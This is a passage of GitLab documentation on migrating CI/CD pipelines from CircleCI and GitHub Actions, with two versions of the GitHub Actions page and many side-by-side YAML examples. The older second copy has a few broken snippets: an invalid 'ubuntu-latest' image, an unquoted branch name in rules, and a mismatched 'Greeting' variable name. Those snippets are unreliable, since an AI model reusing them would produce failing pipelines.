    - echo "Deploy job"
  rules:
    - if: $CI_COMMIT_BRANCH == "main" || $CI_COMMIT_BRANCH =~ /^rc-/
  environment: production
```

### Caching

GitLab provides a caching mechanism to speed up build times for your jobs by reusing previously downloaded dependencies. It's important to know the difference between [cache and artifacts](../caching/_index.md#how-cache-is-different-from-artifacts) to make the best use of these features.

CircleCI example of a job using a cache:

```yaml
jobs:
  job1:
    steps:
      - restore_cache:
          key: source-v1-{{ .Revision }}
      - checkout
      - run: npm install
      - save_cache:
          key: source-v1-{{ .Revision }}
          paths:
            - "node_modules"
```

Example of the same pipeline using `cache` in GitLab CI/CD:

```yaml
test_async:
  image: node:latest
  cache:  # Cache modules in between jobs
    key: $CI_COMMIT_REF_SLUG
    paths:
      - .npm/
  before_script:
    - npm ci --cache .npm --prefer-offline
  script:
    - node ./specs/start.js ./specs/async.spec.js
```

## Contexts and variables

CircleCI provides [Contexts](https://circleci.com/docs/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/_index.md) can be created to assemble related projects together.
At the group level, [CI/CD variables](../variables/_index.md#for-a-group) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. ## Orbs There are two GitLab issues open addressing CircleCI Orbs and how GitLab can achieve similar functionality. - [issue #1151](https://gitlab.com/gitlab-com/Product/-/issues/1151) - [issue #195173](https://gitlab.com/gitlab-org/gitlab/-/issues/195173) ## Build environments CircleCI offers `executors` as the underlying technology to run a specific job. In GitLab, this is done by [runners](https://docs.gitlab.com/runner/). The following environments are supported: Self-managed runners: - Linux - Windows - macOS GitLab.com instance runners: - Linux - [Windows](../runners/hosted_runners/windows.md) ([beta](../../policy/development_stages_support.md#beta)). - [macOS](../runners/hosted_runners/macos.md) ([beta](../../policy/development_stages_support.md#beta)). ### Machine and specific build environments [Tags](../yaml/_index.md#tags) can be used to run jobs on different platforms, by telling GitLab which runners should run the jobs. CircleCI example of a job running on a specific environment: ```yaml jobs: ubuntuJob: machine: image: ubuntu-1604:201903-01 steps: - checkout - run: echo "Hello, $USER!" osxJob: macos: xcode: 11.3.0 steps: - checkout - run: echo "Hello, $USER!" ``` Example of the same job using `tags` in GitLab CI/CD: ```yaml windows job: stage: build tags: - windows script: - echo Hello, %USERNAME%! osx job: stage: build tags: - osx script: - echo "Hello, $USER!" ```
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrating from GitHub Actions
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you're migrating from GitHub Actions to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your GitHub Actions workflows.

## Key Similarities and Differences

GitHub Actions and GitLab CI/CD are both used to generate pipelines to automate building, testing, and deploying your code. Both share similarities including:

- CI/CD functionality has direct access to the code stored in the project repository.
- Pipeline configurations are written in YAML and stored in the project repository.
- Pipelines are configurable and can run in different stages.
- Jobs can each use a different container image.

Additionally, there are some important differences between the two:

- GitHub has a marketplace for downloading 3rd-party actions, which might require additional support or licenses.
- GitLab Self-Managed supports both horizontal and vertical scaling, while GitHub Enterprise Server only supports vertical scaling.
- GitLab maintains and supports all features in-house, and some 3rd-party integrations are accessible through templates.
- GitLab provides a built-in container registry.
- GitLab has native Kubernetes deployment support.
- GitLab provides granular security policies.

## Comparison of features and concepts

Many GitHub features and concepts have equivalents in GitLab that offer the same functionality.

### Configuration file

GitHub Actions can be configured with a [workflow YAML file](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#understanding-the-workflow-file). GitLab CI/CD uses a `.gitlab-ci.yml` YAML file by default.
For example, in a GitHub Actions `workflow` file:

```yaml
on: [push]
jobs:
  hello:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Hello World"
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - hello

hello:
  stage: hello
  script:
    - echo "Hello World"
```

### GitHub Actions workflow syntax

A GitHub Actions configuration is defined in a `workflow` YAML file using specific keywords. GitLab CI/CD has similar functionality, also usually configured with YAML keywords.

| GitHub    | GitLab         | Explanation |
|-----------|----------------|-------------|
| `env`     | `variables`    | `env` defines the variables set in a workflow, job, or step. GitLab uses `variables` to define [CI/CD variables](../variables/_index.md) at the global or job level. Variables can also be added in the UI. |
| `jobs`    | `stages`       | `jobs` groups together all the jobs that run in the workflow. GitLab uses `stages` to group jobs together. |
| `on`      | Not applicable | `on` defines when a workflow is triggered. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. |
| `run`     | `script`       | `run` defines the command to execute in the step. GitLab uses a YAML array under the `script` keyword, one entry for each command to execute. |
| `runs-on` | `tags`         | `runs-on` defines the GitHub runner that a job must run on. GitLab uses `tags` to select a runner. |
| `steps`   | `script`       | `steps` groups together all the steps that run in a job. GitLab uses `script` to group together all the commands run in a job. |
| `uses`    | `include`      | `uses` defines the GitHub Action to add to a `step`. GitLab uses `include` to add configuration from other files to a job. |

### Common configurations

This section goes over commonly used CI/CD configurations, showing how they can be converted from GitHub Actions to GitLab CI/CD.
[GitHub Action workflows](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#workflows) generate automated CI/CD jobs that are triggered when certain events take place, for example pushing a new commit. A GitHub Action workflow is a YAML file defined in the `.github/workflows` directory located in the root of the repository. The GitLab equivalent is the `.gitlab-ci.yml` configuration file, which also resides in the repository's root directory.

#### Jobs

Jobs are a set of commands that run in a set sequence to achieve a particular result, for example building a container or deploying to production.

For example, this GitHub Actions `workflow` builds an executable then deploys it to staging. The jobs run sequentially, because the `deploy` job depends on the `build` job:

```yaml
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    container: golang:alpine
    steps:
      - run: apk update
      - run: go build -o bin/hello
      - uses: actions/upload-artifact@v3
        with:
          name: hello
          path: bin/hello
          retention-days: 7
  deploy:
    if: contains( github.ref, 'staging')
    needs: build
    runs-on: ubuntu-latest
    container: golang:alpine
    steps:
      - uses: actions/download-artifact@v3
        with:
          name: hello
      - run: echo "Deploying to Staging"
      - run: scp bin/hello remoteuser@remotehost:/remote/directory
```

This example:

- Uses the `golang:alpine` container image.
- Runs a job for building code.
- Stores the build executable as an artifact.
- Runs a second job to deploy to `staging`, which also:
  - Requires the build job to succeed before running.
  - Requires the target branch to be `staging`.
  - Uses the build executable artifact.
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: golang:alpine

stages:
  - build
  - deploy

build-job:
  stage: build
  script:
    - apk update
    - go build -o bin/hello
  artifacts:
    paths:
      - bin/hello
    expire_in: 1 week

deploy-job:
  stage: deploy
  script:
    - echo "Deploying to Staging"
    - scp bin/hello remoteuser@remotehost:/remote/directory
  rules:
    - if: $CI_COMMIT_BRANCH == 'staging'
```

##### Parallel

In both GitHub and GitLab, jobs run in parallel by default.

For example, in a GitHub Actions `workflow` file:

```yaml
on: [push]
jobs:
  python-version:
    runs-on: ubuntu-latest
    container: python:latest
    steps:
      - run: python --version
  java-version:
    if: contains( github.ref, 'staging')
    runs-on: ubuntu-latest
    container: openjdk:latest
    steps:
      - run: java -version
```

This example runs a Python job and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
python-version:
  image: python:latest
  script:
    - python --version

java-version:
  image: openjdk:latest
  rules:
    - if: $CI_COMMIT_BRANCH == 'staging'
  script:
    - java -version
```

In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner, assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed.

##### Matrix

In both GitLab and GitHub you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job.
For example, in a GitHub Actions `workflow` file:

```yaml
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Building ${{ matrix.platform }} for ${{ matrix.arch }}"
    strategy:
      matrix:
        platform: [linux, mac, windows]
        arch: [x64, x86]
  test:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Testing ${{ matrix.platform }} for ${{ matrix.arch }}"
    strategy:
      matrix:
        platform: [linux, mac, windows]
        arch: [x64, x86]
  deploy:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Deploying ${{ matrix.platform }} for ${{ matrix.arch }}"
    strategy:
      matrix:
        platform: [linux, mac, windows]
        arch: [x64, x86]
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - build
  - test
  - deploy

.parallel-hidden-job:
  parallel:
    matrix:
      - PLATFORM: [linux, mac, windows]
        ARCH: [x64, x86]

build-job:
  extends: .parallel-hidden-job
  stage: build
  script:
    - echo "Building $PLATFORM for $ARCH"

test-job:
  extends: .parallel-hidden-job
  stage: test
  script:
    - echo "Testing $PLATFORM for $ARCH"

deploy-job:
  extends: .parallel-hidden-job
  stage: deploy
  script:
    - echo "Deploying $PLATFORM for $ARCH"
```

#### Trigger

GitHub Actions requires you to add a trigger for your workflow. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required.

Sample GitHub Actions configuration:

```yaml
on:
  push:
    branches:
      - main
```

The equivalent GitLab CI/CD configuration would be:

```yaml
rules:
  - if: $CI_COMMIT_BRANCH == "main"
```

Pipelines can also be [scheduled by using Cron syntax](../pipelines/schedules.md).

#### Container Images

With GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) by using the [`image`](../yaml/_index.md#image) keyword.

For example, in a GitHub Actions `workflow` file:

```yaml
jobs:
  update:
    runs-on: ubuntu-latest
    container: alpine:latest
    steps:
      - run: apk update
```

In this example, the `apk update` command runs in an `alpine:latest` container.
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
update-job:
  image: alpine:latest
  script:
    - apk update
```

GitLab provides every project a [container registry](../../user/packages/container_registry/_index.md) for hosting container images. Container images can be built and stored directly from GitLab CI/CD pipelines. For example:

```yaml
stages:
  - build

build-image:
  stage: build
  variables:
    IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $IMAGE .
    - docker push $IMAGE
```

#### Variables

In GitLab, we use the `variables` keyword to define different [CI/CD variables](../variables/_index.md) at runtime. Use variables when you need to reuse configuration data in a pipeline. You can define variables globally or per job.

For example, in a GitHub Actions `workflow` file:

```yaml
env:
  NAME: "fern"

jobs:
  english:
    runs-on: ubuntu-latest
    env:
      GREETING: "hello"
    steps:
      - run: echo "$GREETING $NAME"
  spanish:
    runs-on: ubuntu-latest
    env:
      GREETING: "hola"
    steps:
      - run: echo "$GREETING $NAME"
```

In this example, variables provide different outputs for the jobs.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: ubuntu:latest

variables:
  NAME: "fern"

english:
  variables:
    GREETING: "hello"
  script:
    - echo "$GREETING $NAME"

spanish:
  variables:
    GREETING: "hola"
  script:
    - echo "$GREETING $NAME"
```

Variables can also be set up through the GitLab UI, under CI/CD settings, where you can [protect](../variables/_index.md#protect-a-cicd-variable) or [mask](../variables/_index.md#mask-a-cicd-variable) the variables. Masked variables are hidden in job logs, while protected variables can only be accessed in pipelines for protected branches or tags.
For example, in a GitHub Actions `workflow` file:

```yaml
jobs:
  login:
    runs-on: ubuntu-latest
    env:
      AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
    steps:
      - run: my-login-script.sh "$AWS_ACCESS_KEY"
```

If the `AWS_ACCESS_KEY` variable is defined in the GitLab project settings, the equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
login:
  script:
    - my-login-script.sh $AWS_ACCESS_KEY
```

Additionally, [GitHub Actions](https://docs.github.com/en/actions/learn-github-actions/contexts) and [GitLab CI/CD](../variables/predefined_variables.md) provide built-in variables which contain data relevant to the pipeline and repository.

#### Conditionals

When a new pipeline starts, GitLab checks the pipeline configuration to determine which jobs should run in that pipeline. You can use the [`rules` keyword](../yaml/_index.md#rules) to configure jobs to run depending on conditions like the status of variables, or the pipeline type.

For example, in a GitHub Actions `workflow` file:

```yaml
jobs:
  deploy_staging:
    if: contains( github.ref, 'staging')
    runs-on: ubuntu-latest
    steps:
      - run: echo "Deploy to staging server"
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
deploy_staging:
  stage: deploy
  script:
    - echo "Deploy to staging server"
  rules:
    - if: $CI_COMMIT_BRANCH == "staging"
```

#### Runners

Runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners.

Some key details about runners:

- Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project.
- You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware.
- GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed.

For example, in a GitHub Actions `workflow` file:

```yaml
linux_job:
  runs-on: ubuntu-latest
  steps:
    - run: echo "Hello, $USER"

windows_job:
  runs-on: windows-latest
  steps:
    - run: echo "Hello, %USERNAME%"
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
linux_job:
  stage: build
  tags:
    - linux-runners
  script:
    - echo "Hello, $USER"

windows_job:
  stage: build
  tags:
    - windows-runners
  script:
    - echo "Hello, %USERNAME%"
```

#### Artifacts

In GitLab, any job can use the [artifacts](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs.

For example, in a GitHub Actions `workflow` file:

```yaml
on: [push]
jobs:
  generate_cat:
    runs-on: ubuntu-latest
    steps:
      - run: touch cat.txt
      - run: echo "meow" > cat.txt
      - uses: actions/upload-artifact@v3
        with:
          name: cat
          path: cat.txt
          retention-days: 7
  use_cat:
    runs-on: ubuntu-latest
    needs: [generate_cat]
    steps:
      - uses: actions/download-artifact@v3
        with:
          name: cat
      - run: cat cat.txt
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - generate
  - use

generate_cat:
  stage: generate
  script:
    - touch cat.txt
    - echo "meow" > cat.txt
  artifacts:
    paths:
      - cat.txt
    expire_in: 1 week

use_cat:
  stage: use
  script:
    - cat cat.txt
```

#### Caching

A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching).
For example, in a GitHub Actions `workflow` file:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "This job uses a cache."
      - uses: actions/cache@v3
        with:
          path: binaries/
          key: binaries-cache-${{ github.ref_name }}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
cache-job:
  script:
    - echo "This job uses a cache."
  cache:
    key: binaries-cache-$CI_COMMIT_REF_SLUG
    paths:
      - binaries/
```

#### Templates

In GitHub, an Action is a set of complex tasks that needs to be frequently repeated, saved to enable reuse without redefining a CI/CD pipeline. In GitLab, the equivalent to an action would be the [`include` keyword](../yaml/includes.md), which allows you to [add CI/CD pipelines from other files](../yaml/includes.md), including template files built into GitLab.

Sample GitHub Actions configuration:

```yaml
- uses: hashicorp/setup-terraform@v2.0.3
```

The equivalent GitLab CI/CD configuration would be:

```yaml
include:
  - template: Terraform.gitlab-ci.yml
```

In these examples, the `setup-terraform` GitHub action and the `Terraform.gitlab-ci.yml` GitLab template are not exact matches. These two examples are just to show how complex configuration can be reused.

### Security Scanning features

GitLab provides a variety of [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these features to your GitLab CI/CD pipeline by using templates. For example, to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`:

```yaml
include:
  - template: Jobs/SAST.gitlab-ci.yml
```

You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables).

### Secrets Management

Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow.
You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure. You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). 
   - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site.
   - Review the [CI/CD YAML syntax reference](../yaml/_index.md).
1. Set up and configure GitLab.
1. Test your GitLab instance.
   - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners.

### Migration Steps

1. Migrate Projects from GitHub to GitLab:
   - (Recommended) You can use the [GitHub Importer](../../user/project/import/github.md) to automate mass imports from external SCM providers.
   - You can [import repositories by URL](../../user/project/import/repo_by_url.md).
1. Create a `.gitlab-ci.yml` in each project.
1. Migrate GitHub Actions jobs to GitLab CI/CD jobs and configure them to show results directly in merge requests.
1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md).
1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation).
1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient.

### Additional Resources

- [Video: How to migrate from GitHub to GitLab including Actions](https://youtu.be/0Id5oMl1Kqs?feature=shared)
- [Blog: GitHub to GitLab migration the easy way](https://about.gitlab.com/blog/2023/07/11/github-to-gitlab-migration-made-easy/)

If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from GitHub Actions breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from GitHub Actions to GitLab CI/CD, you are able to create CI/CD pipelines that replicate and enhance your GitHub Action workflows. ## Key Similarities and Differences GitHub Actions and GitLab CI/CD are both used to generate pipelines to automate building, testing, and deploying your code. Both share similarities including: - CI/CD functionality has direct access to the code stored in the project repository. - Pipeline configurations written in YAML and stored in the project repository. - Pipelines are configurable and can run in different stages. - Jobs can each use a different container image. Additionally, there are some important differences between the two: - GitHub has a marketplace for downloading 3rd-party actions, which might require additional support or licenses. - GitLab Self-Managed supports both horizontal and vertical scaling, while GitHub Enterprise Server only supports vertical scaling. - GitLab maintains and supports all features in house, and some 3rd-party integrations are accessible through templates. - GitLab provides a built-in container registry. - GitLab has native Kubernetes deployment support. - GitLab provides granular security policies. ## Comparison of features and concepts Many GitHub features and concepts have equivalents in GitLab that offer the same functionality. ### Configuration file GitHub Actions can be configured with a [workflow YAML file](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#understanding-the-workflow-file). 
GitLab CI/CD uses a `.gitlab-ci.yml` YAML file by default. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: hello: runs-on: ubuntu-latest steps: - run: echo "Hello World" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - hello hello: stage: hello script: - echo "Hello World" ``` ### GitHub Actions workflow syntax A GitHub Actions configuration is defined in a `workflow` YAML file using specific keywords. GitLab CI/CD has similar functionality, also usually configured with YAML keywords. | GitHub | GitLab | Explanation | |-----------|----------------|-------------| | `env` | `variables` | `env` defines the variables set in a workflow, job, or step. GitLab uses `variables` to define [CI/CD variables](../variables/_index.md) at the global or job level. Variables can also be added in the UI. | | `jobs` | `stages` | `jobs` groups together all the jobs that run in the workflow. GitLab uses `stages` to group jobs together. | | `on` | Not applicable | `on` defines when a workflow is triggered. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. | | `run` | Not applicable | The command to execute in the job. GitLab uses a YAML array under the `script` keyword, one entry for each command to execute. | | `runs-on` | `tags` | `runs-on` defines the GitHub runner that a job must run on. GitLab uses `tags` to select a runner. | | `steps` | `script` | `steps` groups together all the steps that run in a job. GitLab uses `script` to group together all the commands run in a job. | | `uses` | `include` | `uses` defines what GitHub Action to be added to a `step`. GitLab uses `include` to add configuration from other files to a job. | ### Common configurations This section goes over commonly used CI/CD configurations, showing how they can be converted from GitHub Actions to GitLab CI/CD. 
[GitHub Action workflows](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#workflows) generate automated CI/CD jobs that are triggered when certain event take place, for example pushing a new commit. A GitHub Action workflow is a YAML file defined in the `.github/workflows` directory located in the root of the repository. The GitLab equivalent is the `.gitlab-ci.yml` configuration file, which also resides in the repository's root directory. #### Jobs Jobs are a set of commands that run in a set sequence to achieve a particular result, for example building a container or deploying to production. For example, this GitHub Actions `workflow` builds a container then deploys it to production. The jobs runs sequentially, because the `deploy` job depends on the `build` job: ```yaml on: [push] jobs: build: runs-on: ubuntu-latest container: golang:alpine steps: - run: apk update - run: go build -o bin/hello - uses: actions/upload-artifact@v3 with: name: hello path: bin/hello retention-days: 7 deploy: if: contains( github.ref, 'staging') runs-on: ubuntu-latest container: golang:alpine steps: - uses: actions/download-artifact@v3 with: name: hello - run: echo "Deploying to Staging" - run: scp bin/hello remoteuser@remotehost:/remote/directory ``` This example: - Uses the `golang:alpine` container image. - Runs a job for building code. - Stores build executable as artifact. - Runs a second job to deploy to `staging`, which also: - Requires the build job to succeed before running. - Requires the commit target branch `staging`. - Uses the build executable artifact. 
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: golang:alpine stages: - build - deploy build-job: stage: build script: - apk update - go build -o bin/hello artifacts: paths: - bin/hello expire_in: 1 week deploy-job: stage: deploy script: - echo "Deploying to Staging" - scp bin/hello remoteuser@remotehost:/remote/directory rules: - if: $CI_COMMIT_BRANCH == 'staging' ``` ##### Parallel In both GitHub and GitLab, Jobs run in parallel by default. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: python-version: runs-on: ubuntu-latest container: python:latest steps: - run: python --version java-version: if: contains( github.ref, 'staging') runs-on: ubuntu-latest container: openjdk:latest steps: - run: java -version ``` This example runs a Python job and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml python-version: image: python:latest script: - python --version java-version: image: openjdk:latest rules: - if: $CI_COMMIT_BRANCH == 'staging' script: - java -version ``` In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed. ##### Matrix In both GitLab and GitHub you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. 
For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: build: runs-on: ubuntu-latest steps: - run: echo "Building $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] test: runs-on: ubuntu-latest steps: - run: echo "Testing $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] deploy: runs-on: ubuntu-latest steps: - run: echo "Deploying $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - build - test - deploy .parallel-hidden-job: parallel: matrix: - PLATFORM: [linux, mac, windows] ARCH: [x64, x86] build-job: extends: .parallel-hidden-job stage: build script: - echo "Building $PLATFORM for $ARCH" test-job: extends: .parallel-hidden-job stage: test script: - echo "Testing $PLATFORM for $ARCH" deploy-job: extends: .parallel-hidden-job stage: deploy script: - echo "Deploying $PLATFORM for $ARCH" ``` #### Trigger GitHub Actions requires you to add a trigger for your workflow. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. Sample GitHub Actions configuration: ```yaml on: push: branches: - main ``` The equivalent GitLab CI/CD configuration would be: ```yaml rules: - if: '$CI_COMMIT_BRANCH == main' ``` Pipelines can also be [scheduled by using Cron syntax](../pipelines/schedules.md). #### Container Images With GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) by using the [`image`](../yaml/_index.md#image) keyword. For example, in a GitHub Actions `workflow` file: ```yaml jobs: update: runs-on: ubuntu-latest container: alpine:latest steps: - run: apk update ``` In this example the `apk update` command runs in an `alpine:latest` container. 
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml update-job: image: alpine:latest script: - apk update ``` GitLab provides every project a [container registry](../../user/packages/container_registry/_index.md) for hosting container images. Container images can be built and stored directly from GitLab CI/CD pipelines. For example: ```yaml stages: - build build-image: stage: build variables: IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - docker build -t $IMAGE . - docker push $IMAGE ``` #### Variables In GitLab, we use the `variables` keyword to define different [CI/CD variables](../variables/_index.md) at runtime. Use variables when you need to reuse configuration data in a pipeline. You can define variables globally or per job. For example, in a GitHub Actions `workflow` file: ```yaml env: NAME: "fern" jobs: english: runs-on: ubuntu-latest env: Greeting: "hello" steps: - run: echo "$GREETING $NAME" spanish: runs-on: ubuntu-latest env: Greeting: "hola" steps: - run: echo "$GREETING $NAME" ``` In this example, variables provide different outputs for the jobs. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: ubuntu-latest variables: NAME: "fern" english: variables: GREETING: "hello" script: - echo "$GREETING $NAME" spanish: variables: GREETING: "hola" script: - echo "$GREETING $NAME" ``` Variables can also be set up through the GitLab UI, under CI/CD settings, where you can [protect](../variables/_index.md#protect-a-cicd-variable) or [mask](../variables/_index.md#mask-a-cicd-variable) the variables. Masked variables are hidden in job logs, while protected variables can only be accessed in pipelines for protected branches or tags. 
For example, in a GitHub Actions `workflow` file: ```yaml jobs: login: runs-on: ubuntu-latest env: AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} steps: - run: my-login-script.sh "$AWS_ACCESS_KEY" ``` If the `AWS_ACCESS_KEY` variable is defined in the GitLab project settings, the equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml login: script: - my-login-script.sh $AWS_ACCESS_KEY ``` Additionally, [GitHub Actions](https://docs.github.com/en/actions/learn-github-actions/contexts) and [GitLab CI/CD](../variables/predefined_variables.md) provide built-in variables which contain data relevant to the pipeline and repository. #### Conditionals When a new pipeline starts, GitLab checks the pipeline configuration to determine which jobs should run in that pipeline. You can use the [`rules` keyword](../yaml/_index.md#rules) to configure jobs to run depending on conditions like the status of variables, or the pipeline type. For example, in a GitHub Actions `workflow` file: ```yaml jobs: deploy_staging: if: contains( github.ref, 'staging') runs-on: ubuntu-latest steps: - run: echo "Deploy to staging server" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml deploy_staging: stage: deploy script: - echo "Deploy to staging server" rules: - if: '$CI_COMMIT_BRANCH == staging' ``` #### Runners Runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. 
- GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed.

For example, in a GitHub Actions `workflow` file:

```yaml
linux_job:
  runs-on: ubuntu-latest
  steps:
    - run: echo "Hello, $USER"

windows_job:
  runs-on: windows-latest
  steps:
    - run: echo "Hello, %USERNAME%"
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
linux_job:
  stage: build
  tags:
    - linux-runners
  script:
    - echo "Hello, $USER"

windows_job:
  stage: build
  tags:
    - windows-runners
  script:
    - echo "Hello, %USERNAME%"
